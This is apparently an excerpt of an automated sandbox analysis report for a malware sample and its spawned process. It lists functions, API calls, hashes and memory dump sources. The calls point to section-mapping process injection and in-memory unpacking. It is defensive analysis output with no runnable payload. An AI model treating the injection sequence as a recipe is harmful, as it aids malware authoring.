Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 02C4A856 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C4A87E
Module32First.KERNEL32(00000000,00000224), ref: 02C4A89E

Memory Dump Source

Source File: 00000000.00000002.1816255737.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c47000_LgigaSKsL6.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 10fda4b4523c4c0813588109c1328d08f4cbedc4d5c225a286f1efb4a8f05c34
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: E7F096355407106FD7203BF5AC9DB6F76ECFF89625F100538E642914C0DF70E9468AA1

Function 02FC003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02FC024D

Strings

kernel32.dll, xrefs: 02FC008F, 02FC0095
cess, xrefs: 02FC018D

Memory Dump Source

Source File: 00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fc0000_LgigaSKsL6.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 610401f59bd3e033c332991e216635eec9ee6a516276f39422bb654a80fc4d1b
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 97525975A01229DFDB64CF58C984BACBBB1BF09304F1480E9E94DAB351DB30AA95DF14

Function 004158A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B19CE8), ref: 0041597F
GetProcAddress.KERNEL32(00000000,0041BCD0), ref: 004159BC
VirtualProtect.KERNELBASE(02B19B2C,02B19CE4,00000040,?), ref: 004159DB

Strings

, xrefs: 004158E5

Memory Dump Source

Source File: 00000000.00000002.1815075152.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LgigaSKsL6.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: c9706728d37e00871e7f67ced595d0c79eb19ddcf454875c36666ff37d1ec3ad
Instruction ID: 9f4e34dfc4b6fe9394a1db25d0a6d7b53828682d58b9ddec5cea0b2bad73ce3c
Opcode Fuzzy Hash: c9706728d37e00871e7f67ced595d0c79eb19ddcf454875c36666ff37d1ec3ad
Instruction Fuzzy Hash: 3D3167149487C0CAE301CB78F8547823FA2EB25744F44847CD189873A5EFBA1524D7EE

Function 02FC0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02FC0223,?,?), ref: 02FC0E19
SetErrorMode.KERNELBASE(00000000,?,?,02FC0223,?,?), ref: 02FC0E1E

Memory Dump Source

Source File: 00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fc0000_LgigaSKsL6.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: ecccb221eca8afc39b238fc6a573dbfafbac2534b4061c7d54fb180911970f8b
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 4AD01231545129B7D7003A94DC09BCD7B1CDF05BA6F108011FB0DD9080CB70954146E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02C4A515 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C4A566

Memory Dump Source

Source File: 00000000.00000002.1816255737.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c47000_LgigaSKsL6.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: c415ce0398daff5e63247e83cc6d59161442e051075ac0817daa6fd40fc14d08
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 2E113C79A40208EFDB01DF98CA85E99BBF5EF08350F058094F9489B361D771EA90EF80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00415870 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B19CE4,00415F0B), ref: 00415878

Memory Dump Source

Source File: 00000000.00000002.1815075152.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LgigaSKsL6.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: edc34b9f6b4820ea05e34d55aad0c07fdf7bc1d6d5b6794533697c47ab2511c9
Instruction ID: d7b87d211da148203f6924bb85ac0980f9e485e76abd759aca5fb629b3ee17cc
Opcode Fuzzy Hash: edc34b9f6b4820ea05e34d55aad0c07fdf7bc1d6d5b6794533697c47ab2511c9
Instruction Fuzzy Hash: D3B092B0DC46409BD7008BA0A814B513AA4E308742F404461F505C2180DA2014208F14

Non-executed Functions

Function 02FC092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 02FC0966
GetProcAddress., xrefs: 02FC09DC, 02FC09DF, 02FC09E4
., xrefs: 02FC095F

Memory Dump Source

Source File: 00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fc0000_LgigaSKsL6.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 8ff8b4bf2f8a73bf94ee3b62b2d3bd9cbce14d2bfb2d03d8720fd332c02ab9fb
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: BA3137B690060ADFDB14CF99C980BAEBBF9FB48364F24404ED541A7710DB71EA45CBA4

Function 02C4A133 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1816255737.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c47000_LgigaSKsL6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: b9ab38117357e116a3c3c073e7a0336d274a407d4fd0ccb0e64697efbc55b2be
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 74118E72380100EFD744DF55DC90EA773EAEB89320B198065ED04CB312EA79E802CB60

Function 00403277 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F

Function 0040324F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F

Function 02FC0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fc0000_LgigaSKsL6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 62bbbbe301047a0cc95ae73cb333040dad8261c8d9955c9f34ed1e45f27ca6e3
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 3A01F772A10601CFDF21CF20C904BAA33E9EB85245F1540ACD60797241EB70A8428B90

Function 00403256 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F

Function 00403247 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F

Function 0040326C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF

Function 00403290 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

Function 00415A70 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00415AA1
WritePrivateProfileStringA.KERNEL32(00418384,0041835C,00418330,0041830C), ref: 00415AC5
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415ACD
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415B0D
GetComputerNameW.KERNEL32(?,?), ref: 00415B21
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415B2F
OpenJobObjectA.KERNEL32(00000000,00000000,004183B4), ref: 00415B3E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415B4F

Strings

-, xrefs: 00415B5C

Memory Dump Source

Source File: 00000000.00000002.1815075152.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LgigaSKsL6.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: a2c051fec9ab3a8fcdae7612af1167ef9935c89225a402f84f65136c1e913747
Instruction ID: 60e73b42405168cd9d510addef8ef3a8b6b73bded157f1632dd387b8ccc8cba3
Opcode Fuzzy Hash: a2c051fec9ab3a8fcdae7612af1167ef9935c89225a402f84f65136c1e913747
Instruction Fuzzy Hash: 9A21FB31A84348EBD7209F94DC85FDA7B74FB4CB52F1041AAF649AA1C0CAB41AC48F59

Function 00415B90 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415BC4
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415BDF
HeapDestroy.KERNEL32(00000000), ref: 00415BFE
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415C06

Memory Dump Source

Source File: 00000000.00000002.1815075152.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LgigaSKsL6.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: 28caf57345e6d0fcc585ba126ae085f4f289dabcd7c9f6727abea3362d7c0c3f
Instruction ID: bd69beaec25cac2caedfc94357a42cf62531597c09bd692e524a47bad036f564
Opcode Fuzzy Hash: 28caf57345e6d0fcc585ba126ae085f4f289dabcd7c9f6727abea3362d7c0c3f
Instruction Fuzzy Hash: CD012630A84704DBD740EBB4ED45BEA7BB8FB0C746F404077F60A97280DE3428548B9A

Analysis Process: vsvrjraPID: 6248, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	31.9%
Signature Coverage:	0%
Total number of Nodes:	163
Total number of Limit Nodes:	7

Executed Functions

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph
